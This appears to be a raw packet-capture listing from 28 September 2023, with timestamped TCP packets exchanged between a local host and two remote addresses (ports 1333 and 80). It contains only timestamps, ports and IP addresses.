                                                                                              Sep 28, 2023 06:01:59.709501982 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709538937 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709552050 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709577084 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709594011 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709628105 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709667921 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709671974 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709706068 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709738016 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709774017 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709791899 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709825993 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709844112 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709868908 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709880114 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709882021 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709908962 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709924936 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709925890 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709961891 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709974051 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709989071 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710011959 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710012913 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710031033 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710050106 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710061073 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710097075 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710098028 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710124016 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710135937 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710165977 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710186958 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710201025 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710223913 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710254908 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710285902 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710325003 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710328102 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710342884 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710356951 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710364103 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710381985 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710402966 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710410118 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710452080 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710477114 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710491896 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710505962 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710515976 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710534096 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710541964 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710552931 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710580111 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710598946 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710634947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710668087 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710705996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710711002 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710747957 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710900068 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710913897 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.710937977 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710957050 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.710980892 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711018085 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711034060 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711071968 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711105108 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711143970 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711175919 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711211920 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711222887 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711258888 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711291075 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711329937 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711345911 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711381912 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711401939 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711440086 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711666107 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711704016 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711755991 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711797953 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.711859941 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.711909056 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.712047100 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.712063074 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.712096930 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.712111950 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.712152004 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.712196112 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.712214947 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.712255955 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.712265015 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.712304115 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.712459087 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.712510109 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.712513924 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.712527990 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.712548018 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.712569952 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.712610006 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.712646008 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.716084957 CEST804981495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.721676111 CEST804981495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.721741915 CEST4981480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.826687098 CEST4981480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.827349901 CEST4981680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.882646084 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.882736921 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.882807016 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.882848978 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.882865906 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.882888079 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.882914066 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.882925034 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.882935047 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.882961988 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.882975101 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.882998943 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883008957 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883050919 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883125067 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883162975 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883176088 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883198977 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883217096 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883234978 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883248091 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883272886 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883281946 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883325100 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883374929 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883414030 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883428097 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883461952 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883517027 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883572102 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883644104 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883699894 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883712053 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883759975 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883814096 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883850098 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883871078 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883898020 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883918047 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.883966923 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.883985043 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884033918 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884053946 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884088993 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884102106 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884136915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884190083 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884248018 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884295940 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884332895 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884357929 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884367943 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884377003 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884413004 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884435892 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884483099 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884504080 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884548903 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884571075 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884614944 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884639025 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884682894 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884707928 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884742975 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884751081 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884778976 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884785891 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884821892 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884845972 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884890079 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884912968 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.884957075 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.884999990 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885049105 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885067940 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885111094 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885135889 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885170937 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885178089 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885214090 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885237932 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885272980 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885282040 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885315895 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885339975 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885382891 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885409117 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885443926 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885452032 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885482073 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885485888 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885525942 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885550022 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885586023 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885595083 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885627985 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885684013 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885721922 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885727882 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885763884 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885788918 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885824919 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885834932 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885868073 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885921001 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.885963917 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.885987997 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886033058 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886054993 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886097908 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886358023 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886393070 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886405945 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886447906 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886457920 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886487961 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886492968 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886524916 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886531115 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886560917 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886568069 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886598110 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886604071 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886634111 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886641979 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886671066 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886682987 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886707067 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886713028 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886743069 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886749983 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886785030 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886792898 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886821032 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886827946 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886864901 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886919022 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.886960983 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.886987925 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887025118 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887044907 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887068987 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887093067 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887140989 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887160063 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887196064 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887204885 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887243986 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887295008 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887331963 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887346983 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887367964 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887383938 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887425900 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887466908 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887520075 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887537003 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887587070 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887604952 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887655973 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887674093 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887726068 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887772083 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887824059 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887840033 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887876987 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887892008 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887912035 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887932062 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887950897 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.887968063 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.887990952 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888019085 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888056993 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888071060 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888106108 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888125896 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888180017 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888194084 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888236046 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888251066 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888298988 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888319969 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888370037 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888540983 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888577938 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888591051 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888629913 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888683081 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888736963 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888782978 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888832092 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888880014 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888916016 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888931036 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888952017 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.888967991 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.888988018 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889005899 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889028072 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889039040 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889065027 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889074087 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889101982 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889117002 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889137983 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889149904 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889173985 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889192104 CEST498101333192.168.2.3116.202.2.169
